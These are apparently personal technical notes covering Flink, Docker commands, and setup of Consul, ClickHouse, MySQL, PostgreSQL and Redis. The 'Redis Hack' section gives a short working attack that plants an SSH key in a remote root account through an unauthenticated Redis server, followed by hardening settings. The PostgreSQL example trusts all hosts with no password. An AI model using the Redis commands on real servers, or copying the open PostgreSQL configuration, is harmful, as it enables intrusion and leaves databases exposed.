
Programming

1 - BigData

1.1 - Flink

1.1.1 - Flink Code

CliFrontend

build StreamGraph

org.apache.flink.client.cli.CliFrontend#main

FLINK_CONF_DIR=./flink-dist/src/main/resources

# submit a job
run ./flink-examples/flink-examples-streaming/target/WordCount.jar

StandaloneSessionClusterEntrypoint

run JobManager

org.apache.flink.runtime.entrypoint.StandaloneSessionClusterEntrypoint

-c ./flink-dist/src/main/resources

1.1.2 - Flink Deploy

Cluster

Starting a Session Cluster on Docker

# https://ci.apache.org/projects/flink/flink-docs-master/docs/deployment/resource-providers/standalone/docker/#starting-a-session-cluster-on-docker

FLINK_PROPERTIES="jobmanager.rpc.address: flink-jobmanager"
docker network create flink

# launch the JobManager
docker run -d \
    --name=flink-jobmanager \
    --network flink \
    --publish 8081:8081 \
    --env FLINK_PROPERTIES="${FLINK_PROPERTIES}" \
    flink jobmanager
    
# one or more TaskManager containers    
docker run -d \
    --name=flink-taskmanager1 \
    --network flink \
    --env FLINK_PROPERTIES="${FLINK_PROPERTIES}" \
    flink taskmanager
    
# submit a task    
./bin/flink run ./examples/streaming/TopSpeedWindowing.jar    

1.1.3 - Flink Principle

Overall Architecture

A Flink system consists of three parts: the Flink Program, the JobManager, and the TaskManagers. All three communicate through the Akka framework (Actor System), driving work forward by exchanging messages.

The Flink Program loads the user-submitted job code, parses it into a job execution topology, and submits that topology to the JobManager.

The JobManager turns the job topology into a physical execution plan and dispatches it to the TaskManagers for execution. It also coordinates checkpointing: it continuously collects operator state from the TaskManagers and periodically produces checkpoints, so that after a failure the system can restore its previous state from a checkpoint.

Each TaskManager manages the resources needed for execution, runs the actual tasks, and forwards the data streams they produce to downstream tasks. Each TaskManager runs as a single JVM process, and each TaskSlot runs a task in its own thread.

Consistency Guarantees and Failure Handling

In a distributed setting, data can be lost, reordered, or duplicated. Flink handles reordering with Event Time (the time an event actually occurred) combined with Watermarks (markers indicating that data up to a certain time is complete). For loss and duplication, Flink uses distributed snapshots to provide exactly-once semantics.

  • Distributed snapshots

Flink's distributed snapshot mechanism is based on the Chandy-Lamport algorithm.

Flink periodically injects a special record, the barrier, into the normal data stream. When an operator processes a barrier, it saves its current state to persistent storage. An operator with multiple inputs must align the barriers: once one input has received the barrier, subsequent records on that input are buffered until the barrier has arrived on every input; only then does the operator snapshot its state and forward the barrier downstream.

Besides snapshotting operator state, sinks need one extra step: writing results to external systems. Flink implements this distributed transaction with a two-phase commit protocol (2PC).

Flow Control

When a downstream InputChannel receives data from an upstream ResultPartition, it computes a credit value from the amount of data it has already buffered and from what it can still allocate out of the LocalBufferPool and NetworkBufferPool, and returns that credit upstream. The upstream side decides how much data to send based on the credit; like a credit-card limit, it must not be exceeded. When the downstream side becomes congested, the credit drops to 0 and the upstream stops sending. The congestion pressure keeps propagating upstream, producing backpressure.

2 - Cloud

2.1 - Consul

install

docker run -d --name=consul1 \
    -p 8500:8500 \
    -e CONSUL_BIND_INTERFACE=eth0 \
    consul
docker run -d --name consul2 -e CONSUL_BIND_INTERFACE=eth0 \
    consul agent -dev -join=172.17.0.2

# query for all the members in the cluster
docker exec -t consul1 consul members

curl http://localhost:8500/v1/health/service/consul?pretty

2.2 - Docker

2.2.1 - Docker Build

build

docker build [OPTIONS] PATH | URL | -

# use Dockerfile in current path to build a image
docker build -t [repository]/[username]/[remote_image_name]:[tag] ./
# or
docker build -t [local_image_name]  ./
docker image tag [local_image_name] [repository]/[username]/[remote_image_name]:[tag]
# finally
docker push [repository]/[username]/[remote_image_name]:[tag]
  • -f, --file : Name of the Dockerfile
  • --force-rm : Always remove intermediate containers
  • --no-cache : Do not use cache when building the image
  • --pull : Always attempt to pull a newer version of the image
  • --quiet, -q : Only print image ID on success
  • --tag, -t : Name and optionally a tag in the 'name:tag' format
  • --network : Set the networking mode for the RUN instructions during build (default "default")

Dockerfile

ENV FOO=BAR
# cid=$(docker run -e FOO=BAR <image>)
# docker commit $cid

.dockerignore

.git
README.md

2.2.2 - Docker Container

run

# create a detached (daemonized) container
docker run -itd ubuntu:14.04 /bin/bash 

# docker ps
# attach to a running container
docker attach <container_id> 
# when multiple terminals attach to the same container, they all mirror the same output

# enter a Docker container
docker exec -it CONTAINER_NAME /bin/bash
# create a new container and run a command in it
docker run [OPTIONS] IMAGE [COMMAND] [ARG...]

OPTIONS (a combined example follows the list):

  • -a stdin : attach to a standard stream; one of STDIN/STDOUT/STDERR
  • -d : run the container in the background and print the container ID
  • -i : run interactively, keeping STDIN open; usually combined with -t
  • -p : port mapping, in host_port:container_port format
  • -v : mount a host directory into the container
  • -t : allocate a pseudo-TTY; usually combined with -i
  • --name="cname" : assign a name to the container
  • --dns 8.8.8.8 : DNS servers for the container (defaults to the host's)
  • --dns-search example.com : DNS search domain for the container (defaults to the host's)
  • -h "hostname" : set the container's hostname
  • -e property=value : set an environment variable
  • --env-file=[] : read environment variables from a file
  • --cpuset="0-2" or --cpuset="0,1,2" : pin the container to specific CPUs
  • -m : memory limit for the container
  • --net="bridge" : network mode; one of bridge/host/none/container:
  • --link=[] : add a link to another container
  • --expose=[] : expose a port or a range of ports
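A single docker run typically combines several of these flags; a minimal sketch (the image, paths, and values are placeholders):

docker run -d --name web \
    -p 8080:80 \
    -v $(pwd)/html:/usr/share/nginx/html \
    -e TZ=UTC \
    --dns 8.8.8.8 \
    -m 512m \
    nginx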
docker start # start one or more stopped containers
docker stop # stop a running container
docker restart # restart a container

docker pause # suspend all processes in the container
docker unpause # resume all processes in the container

attach

# make sure CTRL-D or CTRL-C does not stop the container
docker attach --sig-proxy=false

rm

OPTIONS:

  • -f : force-remove a running container (via SIGKILL)
  • -l : remove the link between containers, not the container itself
  • -v : also remove the volumes associated with the container

create

# create a new container without starting it
docker create [OPTIONS] IMAGE [COMMAND] [ARG...]

exec

# run a command inside a running container
docker exec [OPTIONS] CONTAINER COMMAND [ARG...]

# tty size
docker exec -it -e LINES=$(tput lines) -e COLUMNS=$(tput cols) <cid> bash

OPTIONS:

  • -d : detached mode, run in the background
  • -i : keep STDIN open even if not attached
  • -t : allocate a pseudo-TTY

kill

# Kill one or more running containers
# <signal>
# KILL
docker kill -s <signal>

cp

docker cp [OPTIONS] CONTAINER:SRC_PATH DEST_PATH|-
docker cp [OPTIONS] SRC_PATH|- CONTAINER:DEST_PATH

2.2.3 - Docker Image

# --limit int       Max number of search results (default 25)
# --no-trunc        Don't truncate output
docker search <something> 

pull

docker pull debian
# daemon mode
container_id=`docker run -itd debian /bin/bash `
docker exec -it $container_id /bin/bash  
docker attach $container_id

push

docker commit <container_id> <image_name>
docker tag <image_name> <username>/<imagename>:<tagname>
docker login -u <username> -p <password>
docker push <username>/<imagename>:<tagname>
docker logout

tag

docker tag SOURCE_IMAGE[:TAG] TARGET_IMAGE[:TAG]

commit

# Create a new image from a container's changes
docker commit <container_id> <image_name>
# -a, --author string   Author
# -m, --message string  Commit message

cid=$(docker run -e FOO=BAR <image>)
docker commit $cid

images

# -a, --all         Show all images (default hides intermediate images)
# --digests         Show digests
# --no-trunc        Don't truncate output
# -q, --quiet       Only show numeric IDs
docker images

rmi

# -f, --force
docker rmi [OPTIONS] IMAGE [IMAGE...]

history

# Show the history of an image
# --no-trunc        Don't truncate output
docker history [OPTIONS] IMAGE

save

# Save one or more images to a tar archive
docker save -o <tar_file_name> <image>

load

# Load an image from a tar archive or STDIN。
docker load -i <tar_file_name>

dockertags.sh

#!/bin/bash

if [ $# -lt 1 ]
then
cat << HELP

dockertags  --  list all tags for a Docker image on a remote registry.

EXAMPLE: 
    - list all tags for ubuntu:
       dockertags ubuntu

    - list all php tags containing apache:
       dockertags php apache

HELP
exit 0
fi

image="$1"
tags=`wget -q https://registry.hub.docker.com/v1/repositories/${image}/tags -O -  | sed -e 's/[][]//g' -e 's/"//g' -e 's/ //g' | tr '}' '\n'  | awk -F: '{print $3}'`

if [ -n "$2" ]
then
    tags=` echo "${tags}" | grep "$2" `
fi

echo "${tags}"

2.2.4 - Docker Install

docker

docker-ce

# https://docs.docker.com/engine/install/debian/
sudo apt-get install \
    apt-transport-https \
    ca-certificates \
    curl \
    gnupg \
    lsb-release -y
curl -fsSL https://download.docker.com/linux/debian/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
echo \
  "deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/debian \
  $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null

sudo apt-get update
sudo apt-get install docker-ce docker-ce-cli containerd.io

sudo systemctl status docker

sudo usermod -aG docker $USER

debian/ubuntu

sudo apt-get install docker.io
# order to perform docker without sudo prefix 
sudo usermod -aG docker $USER

sudo systemctl start docker

sudo docker run --rm hello-world

sudo apt-get autoremove --purge docker-io 
rm -rf /var/lib/docker

centos/fedora

sudo dnf install docker
# start the Docker service
# sudo service docker start
sudo systemctl start docker
docker run --rm hello-world

docker version
docker info
# add the user to the docker group to avoid typing sudo
sudo groupadd docker
sudo usermod -aG docker $USER

2.2.5 - Docker Network

# source container
docker run --name mysql -e MYSQL_ROOT_PASSWORD=server -d mysql

# receiving container
# inside the nginx container, use the alias "aliasmysql" as the host name to reach the MySQL service
docker run --name nginx --link mysql:aliasmysql -d nginx

Docker imports all environment variables defined in the source container into the receiving container, so the receiving container can read connection details from its environment.

Host-name resolution works by adding a name-to-IP entry for the alias to the receiving container's /etc/hosts. A quick way to verify both is shown below.
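A sketch verifying both mechanisms (assumes the mysql and nginx containers from the example above are running):

# environment variables injected by --link (the prefix derives from the alias)
docker exec nginx env | grep -i aliasmysql
# the alias-to-IP mapping added to /etc/hosts
docker exec nginx grep aliasmysql /etc/hosts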

network

Docker containers support five network modes (quick sketches follow the list):

1) bridge mode, --net=bridge (default). Docker's default: the container gets its own network namespace with a complete, independent network stack (its own interfaces and so on). This is the most common mode, and what docker run uses when no --net flag is given. Installing Docker adds a bridge named docker0 to the host; each new container obtains an IP address in docker0's subnet and attaches to the bridge, which provides connectivity between the container and the host.

2) host mode, --net=host. The container uses the host's network namespace directly. It has no independent network environment of its own; it shares the host's IP address and ports.

3) none mode, --net=none. The container gets its own network namespace, but nothing is configured inside it; only lo is present. Docker does no network setup at all, so you add interfaces and assign IPs yourself. This is also the mode required if you want to configure container IPs with pipework.

4) container mode, --net=container:NAME_or_ID. Similar to host mode, except the container shares the network namespace of the named container. The two containers share IP and ports and can reach each other via localhost, while the filesystem, processes, and everything else remain isolated.

5) user-defined: a feature added in Docker 1.9 that lets containers use third-party network implementations or dedicated bridge networks, providing network isolation.

In user-defined mode, developers can use any third-party network driver Docker supports to customize container networking. Docker 1.9+ also ships two built-in custom network driver types, bridge and overlay, and can integrate third-party implementations such as Calico, Weave, and Open vSwitch.

Apart from Docker's built-in bridge driver, all the other drivers support cross-host container communication. For networks based on the bridge driver, Docker automatically creates iptables rules that isolate them from other networks and from docker0.
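Quick sketches of the five modes (busybox and the container/network names are placeholders):

docker run -d --name b1 busybox top                     # bridge (default)
docker run -d --net=host --name h1 busybox top          # host: shares the host's network stack
docker run -d --net=none --name n1 busybox top          # none: only lo inside the container
docker run -d --net=container:b1 --name c1 busybox top  # container: shares b1's namespace
docker network create mynet                             # user-defined bridge network
docker run -d --net=mynet --name u1 busybox top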

WARNING: IPv4 forwarding is disabled. Networking will not work.

echo "net.ipv4.ip_forward=1" >>/usr/lib/sysctl.d/00-system.conf
systemctl restart network && systemctl restart docker

volume

  • backup

docker volume create data
docker run -v data:/path/to/data --name data_container \
	-d -it --rm \
	busybox /bin/sh

docker run --rm --volumes-from data_container -v $(pwd):/backup busybox tar cvf /backup/data_backup.tar path/to/data
  • restore

docker run -v data:/path/to/data --name data_container2 \
	-d -it --rm \
	busybox /bin/sh

# the archive stores path/to/data relative to /, so extract from /
# (busybox has no bash, so use sh)
docker run --rm --volumes-from data_container2 \
	-v $(pwd):/backup busybox \
	sh -c "cd / && tar xvf /backup/data_backup.tar"

2.2.6 - Docker Ps

ps

docker ps -a
# Show the latest created container, Only display numeric IDs
docker ps -lq

docker ps --format 'table {{.Names}}\t{{.Image}}'

vim ~/.docker/config.json.
{
  "psFormat": "table {{.Names}}\\t{{.Image}}\\t{{.RunningFor}} ago\\t{{.Status}}\\t{{.Command}}",
  "imagesFormat": "table {{.Repository}}\\t{{.Tag}}\\t{{.ID}}\\t{{.Size}}"
}

OPTIONS:

  • -a : show all containers, including stopped ones
  • -f : filter the output by condition
  • --format : template for the output
  • -l : show the most recently created container
  • -n : show the n most recently created containers
  • --no-trunc : don't truncate output
  • -q : quiet mode, print only container IDs
  • -s : show total file sizes

inspect

# show the PID of the container's first process
docker inspect -f {{.State.Pid}} <container_id> 

docker inspect --format='{{.RootFS.Layers}}' <image_id> 

docker inspect --format='{{.NetworkSettings.IPAddress }}' <container_id> 

Return metadata of a container or image.

OPTIONS:

  • -f : template for the output
  • -s : show total file sizes
  • --type : return JSON for the given type

diff

docker diff <container_id>

top

Show the processes running inside a container.

docker top [OPTIONS] CONTAINER [ps OPTIONS]

# show process info for every running container
for i in  `docker ps |grep Up|awk '{print $1}'`;do echo \ &&docker top $i; done

logs

Fetch a container's logs.

docker logs [OPTIONS] CONTAINER
tail -f /var/lib/docker/containers/<cid>/<cid>-json.log

# collect container logs with fluentd
docker run -d \
	--log-driver=fluentd \
	--log-opt fluentd-address=${fluentd_address} \
	--log-opt tag="docker.{{.Name}}" \
nginx

OPTIONS:

  • -f : follow the log output
  • --since : show all logs since the given timestamp
  • -t : show timestamps
  • --tail : show only the last N lines of logs

Docker engine logs

Ubuntu (14.04): /var/log/upstart/docker.log
Ubuntu (16.04): journalctl -u docker.service
CentOS 7 / RHEL 7 / Fedora: journalctl -u docker.service
CoreOS: journalctl -u docker.service
OpenSuSE: journalctl -u docker.service
OSX: ~/Library/Containers/com.docker.docker/Data/com.docker.driver.amd64-linux/log/docker.log
Debian GNU/Linux 7: /var/log/daemon.log
Debian GNU/Linux 8: journalctl -u docker.service
Boot2Docker: /var/log/docker.log

events

Get real-time events from the server.

docker events [OPTIONS]

OPTIONS:

  • -f : filter events by condition
  • --since : show all events since the given timestamp, e.g. --since="2016-07-01"
  • --until : stream events until the given timestamp

export

Export a container's filesystem as a tar archive to STDOUT.

docker export [OPTIONS] CONTAINER

OPTIONS:

  • -o : write the output to a file instead of STDOUT

wait

Block until a container stops, then print its exit code.

docker wait CONTAINER [CONTAINER...]

port

List a container's port mappings, or look up the public-facing port that is NATed to PRIVATE_PORT.

docker port CONTAINER [PRIVATE_PORT[/PROTO]]

$

# Delete all containers
docker rm $(docker ps -a -q)
# Delete all images
docker rmi $(docker images -q)

/var/lib/docker

  1. /var/lib/docker/devicemapper/devicemapper/data # storage-pool data
  2. /var/lib/docker/devicemapper/devicemapper/metadata # metadata for the storage pool
  3. /var/lib/docker/devicemapper/metadata/ # device_id, size, transaction_id, and initialization info
  4. /var/lib/docker/devicemapper/mnt # mount information
  5. /var/lib/docker/container/ # container information
  6. /var/lib/docker/graph/ # image layers: details, sizes, and dependency info
  7. /var/lib/docker/repositores-devicemapper # basic image information
  8. /var/lib/docker/tmp # Docker temp directory
  9. /var/lib/docker/trust # Docker trust directory
  10. /var/lib/docker/volumes # Docker volumes directory (a disk-usage one-liner follows)
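A quick way to see which of these directories actually hold space (requires root; the layout varies with the storage driver):

sudo du -sh /var/lib/docker/* | sort -h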

2.2.7 - Nsenter

nsenter

wget https://www.kernel.org/pub/linux/utils/util-linux/v2.32/util-linux-2.32.tar.gz
tar -zxf util-linux-2.32.tar.gz &&  cd util-linux-2.32
./configure
make

# make && make install may overwrite low-level OS tools; copy just nsenter instead
cp nsenter /usr/local/bin/

docker-enter

#!/bin/sh

if [ -e $(dirname "$0")/nsenter ]; then
  # with boot2docker, nsenter is not in the PATH but it is in the same folder
  NSENTER=$(dirname "$0")/nsenter
else
  NSENTER=nsenter
fi

if [ -z "$1" ]; then
  echo "Usage: $(basename "$0") CONTAINER [COMMAND [ARG]...]"
  echo ""
  echo "Enters the Docker CONTAINER and executes the specified COMMAND."
  echo "If COMMAND is not specified, runs an interactive shell in CONTAINER."
else
  PID=$(docker inspect --format "{{.State.Pid}}" "$1")
  if [ -z "$PID" ]; then
    exit 1
  fi
  shift

  OPTS="--target $PID --mount --uts --ipc --net --pid --"

  if [ -z "$1" ]; then
    # No command given.
    # Use su to clear all host environment variables except for TERM,
    # initialize the environment variables HOME, SHELL, USER, LOGNAME, PATH,
    # and start a login shell.
    "$NSENTER" $OPTS su - root
  else
    # Use env to clear all host environment variables.
    "$NSENTER" $OPTS env --ignore-environment -- "$@"
  fi
fi

3 - Data

3.1 - ClickHouse

3.1.1 - Install ClickHouse

docker

docker run -d --name clickhouse \
    --ulimit nofile=262144:262144 \
    -p 8123:8123 -p 9000:9000 \
    -e CLICKHOUSE_DB=test \
    -e CLICKHOUSE_USER=root -e CLICKHOUSE_PASSWORD=root \
    -e CLICKHOUSE_DEFAULT_ACCESS_MANAGEMENT=1 \
    clickhouse/clickhouse-server

echo 'SELECT version()' | curl 'http://localhost:8123/' --data-binary @-

3.2 - MQ

3.2.1 - Kafka

install

# https://github.com/provectus/kafka-ui
docker run -p 8080:8080 \
	-e KAFKA_CLUSTERS_0_NAME=local \
	-e KAFKA_CLUSTERS_0_BOOTSTRAPSERVERS=kafka:9092 \
	-d provectuslabs/kafka-ui

3.3 - MySQL

3.3.1 - Install MySQL

Container

docker run -d -it --name mysql57 \
 -e MYSQL_ROOT_PASSWORD=root \
 -p 3306:3306 \
 mysql:5.7

3.4 - PostgreSQL

install

container

# -e POSTGRES_USER=postgres \
# -e POSTGRES_DB=postgres \
docker run -d -it --name postgres15 \
 -e POSTGRES_PASSWORD=postgres \
 -v ${PWD}/postgresql.conf:/var/lib/postgresql/data/postgresql.conf \
 -v ${PWD}/pg_hba.conf:/var/lib/postgresql/data/pg_hba.conf \
 -v ${PWD}/data:/var/lib/postgresql/data \
 -p 5432:5432 \
 postgres:15

docker exec -it postgres15 psql -hlocalhost -U postgres
GRANT ALL PRIVILEGES ON DATABASE postgres to postgres;
ALTER SCHEMA public OWNER to postgres;
GRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA public TO postgres;
GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO postgres;

select name, setting from pg_settings where category = 'File Locations' ;
/var/lib/postgresql/data/pg_hba.conf
local   all             all                                     trust
host    all             all             127.0.0.1/32            trust
host    all             all             ::1/128                 trust
local   replication     all                                     trust
host    replication     all             127.0.0.1/32            trust
host    replication     all             ::1/128                 trust
host   all           all            0.0.0.0/0              trust
/var/lib/postgresql/data/postgresql.conf
listen_addresses = '*'
#port = 5432    # (change requires restart)
max_connections = 100
shared_buffers = 128MB
dynamic_shared_memory_type = posix
max_wal_size = 1GB
min_wal_size = 80MB
log_timezone = 'Etc/UTC'
datestyle = 'iso, mdy'
timezone = 'Etc/UTC'
lc_messages = 'en_US.utf8'
lc_monetary = 'en_US.utf8'
lc_numeric = 'en_US.utf8'
lc_time = 'en_US.utf8'
default_text_search_config = 'pg_catalog.english'

3.5 - Redis

3.5.1 - Redis Cli

Transactions

  • multi — start a transaction

  • exec — commit the transaction, executing all queued commands

  • discard — abandon the transaction and clear its command queue

  • watch key1 [key2...] — watch keys; if any of them changes before exec, the transaction is aborted (see the sketch after this list)

  • unwatch — stop watching all keys; disconnecting also clears all watches
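A minimal optimistic-locking sketch, feeding one redis-cli session over stdin (assumes a local Redis on the default port; the key name balance is made up):

redis-cli <<'EOF'
set balance 100
watch balance
multi
decrby balance 30
exec
EOF

If another client modifies balance between watch and exec, exec replies nil and the queued commands are discarded.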

Publish / Subscribe

  • subscribe key1 [key2...] — subscribe to channels; psubscribe is the glob-pattern version

  • unsubscribe key1 [key2...] — unsubscribe from channels; punsubscribe is the glob-pattern version

  • publish channel message — publish a message to a channel

  • pubsub — introspection (see the example after this list)
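A quick two-terminal sketch (the channel name news is made up):

# terminal 1: blocks and prints messages as they arrive
redis-cli subscribe news
# terminal 2: the reply is the number of subscribers that received the message
redis-cli publish news "hello"
# introspection: active channels and per-channel subscriber counts
redis-cli pubsub channels
redis-cli pubsub numsub news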

Type operations

keys *

string

set k v
# string
type k
get k
# return old value
getset k v
mset k1 v1 k2 v2
mget k1 k2

# set if not exist
msetnx k1 v1 k2 v2
# append to the tail
append k v
# string length
strlen k
# increment a number string, k++
incr k
decr k
# k += d
incrby k d
decrby k d

# overwrite part of the value, starting at offset
setrange k offset v
# substring, both ends inclusive
getrange k start end
# set or clear the bit at the given offset
setbit k offset v

setnx k v
# expire in seconds
set k v ex seconds nx

list

# push one or more values onto the head of list k
lpush k v1 v2
# push only if the list exists
lpushx k v
# return the elements in the given range; offsets like start=0, end=-1
lrange key start end
# pop and return the head element
lpop k
llen k

# remove elements equal to v, scanning from the head; count limits how many
lrem k count v
lset k index v
# return the element at the given index
lindex k index
# trim the list down to the given range
ltrim k start end
# insert v before (or, with "after", after) the pivot value p
linsert k before p v

# push one or more values onto the tail of list k
rpush k v1 v2
rpushx k v
rpop

# atomically: pop the tail element of src, return it,
# and push it onto the head of dest
rpoplpush src dest

hash

hset k f v
# set field f to v only if f does not already exist
hsetnx k f v

hexists k f
hlen k

# delete one or more fields; missing fields are ignored
hdel k f1 f2

# increment the integer value of field f
hincrby k f increment

hgetall k
# return all field names of the hash
hkeys k
# return all values of the hash
hvals k

# set several field-value pairs at once
hmset k f1 v1 f2 v2

set

# members already present in the set are ignored
sadd k m1 m2
smembers k
# number of members in the set
scard k

# is m a member of set k?
sismember k m

# pop and return a random member
spop k
# return a random member without removing it
srandmember k

# remove one or more members; missing members are ignored
srem k m1 m2

# atomically move member m from the src set to the dest set
smove src dest m


sdiff set1 set2
sdiffstore diffSet set1 set2
sunion set1 set2
sinterstore interSet set1 set2

zset

zadd k score1 m1 score2 m2 
zcard k
zincrby k increment m

# count members whose score is between min and max
# (by default inclusive of min and max)
zcount k min max 

# return members in the given rank range,
# ordered by score ascending
zrange k start end withscores
# same, ordered by score descending
zrevrange k start end withscores

# return all members whose score is between min and max
# (inclusive of min and max)
zrangebyscore k min max withscores limit offset count

# rank of member m, with members ordered
# by score ascending
zrank k m
zrevrank k m
# score of member m
zscore k m
zrem k m1 m2
# remove all members in the given rank range
zremrangebyrank k start end

zremrangebyscore k min max

info

info memory

Key fields (a grep example follows):

used_memory — bytes allocated by Redis, including memory that has been swapped out

used_memory_human — the same value in human-readable form

used_memory_rss — resident set size, as reported by top or ps, excluding swap

mem_fragmentation_ratio — used_memory_rss / used_memory; a healthy value is about 1.03 with jemalloc

mem_allocator — libc, jemalloc, or tcmalloc
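For example, to pull just these fields (assumes a local Redis):

redis-cli info memory | grep -E 'used_memory:|used_memory_human|used_memory_rss:|mem_fragmentation_ratio|mem_allocator'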

3.5.2 - Redis Deploy

container

docker run -it -d --name redis -p 6379:6379 redis

sentinel

localhost

config set protected-mode no

multi master (3 master, 3 slave, and 3 sentinel)

cat << EOF > redis.conf
port 7000
daemonize yes
cluster-enabled yes
cluster-config-file 7000/nodes.conf
cluster-node-timeout 5000
appendonly yes
EOF

mkdir 7000 7001 7002 7003 7004 7005

cat redis.conf | sed s/7000/7000/g > 7000/redis.conf
cat redis.conf | sed s/7000/7001/g > 7001/redis.conf
cat redis.conf | sed s/7000/7002/g > 7002/redis.conf
cat redis.conf | sed s/7000/7003/g > 7003/redis.conf
cat redis.conf | sed s/7000/7004/g > 7004/redis.conf
cat redis.conf | sed s/7000/7005/g > 7005/redis.conf

export redis_server='../redis/src/redis-server'
$redis_server 7000/redis.conf 
$redis_server 7001/redis.conf 
$redis_server 7002/redis.conf 
$redis_server 7003/redis.conf 
$redis_server 7004/redis.conf 
$redis_server 7005/redis.conf 
# three master & three slave
../redis/src/redis-trib.rb create --replicas 1 127.0.0.1:7000 127.0.0.1:7001 \
127.0.0.1:7002 127.0.0.1:7003 127.0.0.1:7004 127.0.0.1:7005
cat << EOF > sentinel.conf
port 26379
daemonize yes

sentinel monitor mymaster1 127.0.0.1 %port1 2
sentinel down-after-milliseconds mymaster1 60000
sentinel failover-timeout mymaster1 180000
sentinel parallel-syncs mymaster1 1

sentinel monitor mymaster2 127.0.0.1 %port2 2
sentinel down-after-milliseconds mymaster2 60000
sentinel failover-timeout mymaster2 180000
sentinel parallel-syncs mymaster2 1

sentinel monitor mymaster3 127.0.0.1 %port3 2
sentinel down-after-milliseconds mymaster3 60000
sentinel failover-timeout mymaster3 180000
sentinel parallel-syncs mymaster3 1
EOF

cat sentinel.conf | sed s/26379/26379/g | sed 's/%port1/7000/g; s/%port2/7001/g; s/%port3/7002/g' > sentinel_0.conf
cat sentinel.conf | sed s/26379/36379/g | sed 's/%port1/7000/g; s/%port2/7001/g; s/%port3/7002/g' > sentinel_1.conf
cat sentinel.conf | sed s/26379/46379/g | sed 's/%port1/7000/g; s/%port2/7001/g; s/%port3/7002/g' > sentinel_2.conf

export redis_server='../redis/src/redis-server'
$redis_server sentinel_0.conf --sentinel
$redis_server sentinel_1.conf --sentinel
$redis_server sentinel_2.conf --sentinel

single master(1 master, 5 slave, and 3 sentinel)

cat << EOF > redis.conf
port 7000
daemonize yes
protected-mode no
# cluster-enabled yes
cluster-config-file 7000/nodes.conf
cluster-node-timeout 5000
appendonly yes
EOF

mkdir 7000 7001 7002 7003 7004 7005

cat redis.conf | sed s/7000/7000/g > 7000/redis.conf
cat redis.conf | sed s/7000/7001/g > 7001/redis.conf
cat redis.conf | sed s/7000/7002/g > 7002/redis.conf
cat redis.conf | sed s/7000/7003/g > 7003/redis.conf
cat redis.conf | sed s/7000/7004/g > 7004/redis.conf
cat redis.conf | sed s/7000/7005/g > 7005/redis.conf

export redis_server='../redis/src/redis-server'
# master
$redis_server 7000/redis.conf
# slave
$redis_server 7001/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7002/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7003/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7004/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7005/redis.conf --slaveof 127.0.0.1 7000
cat << EOF > sentinel.conf
port 26379
daemonize yes
protected-mode no
sentinel monitor mymaster 127.0.0.1 7000 2
sentinel down-after-milliseconds mymaster 60000
sentinel failover-timeout mymaster 180000
sentinel parallel-syncs mymaster 1
EOF

cat sentinel.conf | sed s/26379/26379/g > sentinel_0.conf
cat sentinel.conf | sed s/26379/36379/g > sentinel_1.conf
cat sentinel.conf | sed s/26379/46379/g > sentinel_2.conf

redis_server='../redis/src/redis-server'
$redis_server sentinel_0.conf --sentinel
$redis_server sentinel_1.conf --sentinel
$redis_server sentinel_2.conf --sentinel

3.5.3 - Redis Hack

Remote login

How to reproduce

ssh-keygen -t rsa
(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > foo
cat foo | redis-cli -h $remote_ip -x set crack
redis-cli -h $remote_ip
# in redis CLI
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
# save /root/.ssh/authorized_keys
save

How to avoid

# redis.conf
# prevent changing dbfilename over a remote connection
rename-command FLUSHALL ""
rename-command CONFIG   ""
rename-command EVAL     ""
requirepass mypassword
bind 127.0.0.1

groupadd -r redis && useradd -r -g redis redis

3.5.4 - Redis Persistence

persistence

RDB

periodically forks a child process and dumps the whole dataset to a single file

AOF, append-only file

logs every write and delete operation

# after 300s, dump if at least 10 key changed
save 300 10

# appendfsync: always / everysec / no
# fsync once per second
appendfsync everysec

# grow 100% then rewrite
auto-aof-rewrite-percentage 100
auto-aof-rewrite-min-size 64mb

3.5.5 - Redis Sentinel

sentinel

ping

info replication

info server

info sentinel

sentinel auth-pass <name> <password>

sentinel masters

sentinel master <name>
sentinel slaves <name>

# return the ip and port of the named master;
# if a failover is in progress or finished, the promoted slave's ip and port are shown
sentinel get-master-addr-by-name <name> 

# reset the state of every master whose name matches the pattern
sentinel reset <pattern> 

# force a failover without requiring agreement from other sentinels
sentinel failover <master name> 

# start monitoring a new master
sentinel monitor <name> <ip> <port> <quorum>
# stop monitoring a master
sentinel remove <name>

# change a monitored master's configuration; accepts multiple <option> <value> pairs
sentinel set <name> <option> <value>

conf

# 26379
redis-sentinel /path/to/sentinel.conf

redis-server /path/to/sentinel.conf --sentinel

sentinel.conf

sentinel monitor mymaster 127.0.0.1 6379 2
sentinel down-after-milliseconds mymaster 60000
sentinel failover-timeout mymaster 180000
sentinel parallel-syncs mymaster 1

sentinel monitor resque 192.168.1.3 6380 4
sentinel down-after-milliseconds resque 10000
sentinel failover-timeout resque 180000
sentinel parallel-syncs resque 5

sentinel monitor mymaster 127.0.0.1 6379 2

The trailing 2 is the quorum: only when 2 sentinels in the cluster agree that the master is down is it truly considered unavailable.

sentinel <option_name> <master_name> <option_value>

All of these options can be changed at runtime with the SENTINEL SET command.
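For instance, lowering the SDOWN timeout for mymaster at runtime (assumes a sentinel listening on port 26379):

redis-cli -p 26379 sentinel set mymaster down-after-milliseconds 30000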

down-after-milliseconds

Sentinel sends PING heartbeats to the master to check that it is alive. If the master does not reply with PONG within this window, or replies with an error, the sentinel subjectively (unilaterally) considers the master down.

parallel-syncs

During a failover, this option caps how many slaves may resynchronize with the new master at the same time. The smaller the number, the longer the failover takes; the larger it is, the more slaves become unavailable due to replication. Setting it to 1 guarantees that only one slave at a time is unable to serve requests.

Sentinel has two notions of unavailability: subjectively down (SDOWN) and objectively down (ODOWN). SDOWN is a single sentinel's own view of the master's state; ODOWN requires enough sentinels to agree that the master is down, which they establish by exchanging SENTINEL is-master-down-by-addr results.

min-slaves-to-write 1
min-slaves-max-lag 10

